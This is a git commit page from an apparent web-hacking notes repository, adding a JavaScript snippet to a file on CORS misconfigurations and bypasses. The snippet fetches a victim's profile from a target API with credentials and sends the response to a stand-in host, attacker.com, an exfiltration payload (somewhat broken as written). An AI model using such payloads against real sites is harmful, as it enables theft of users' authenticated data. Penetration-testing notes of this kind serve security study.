vos9/Web_Hacking
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update CORS - Misconfigurations & Bypass.md

Browse Source
This commit is contained in:
Mehdi 2024-08-23 16:44:56 +03:30 committed by GitHub
parent 2e9ae87d60
commit fb0c538961
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 9 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
CORS - Misconfigurations & Bypass.md
View File

@ -30,6 +30,15 @@ xhr.withCredentials = true;
xhr.send(null); xhr.send(null);
``` ```
```javascript
fetch("https://target.com/api/user/profile", {
credentials: "include"
})
.then((response) => {
document.location = "//attacker.com/log?key={0}".format(response.text());
});
```
```javascript ```javascript
fetch(url, { fetch(url, {
credentials: 'include' credentials: 'include'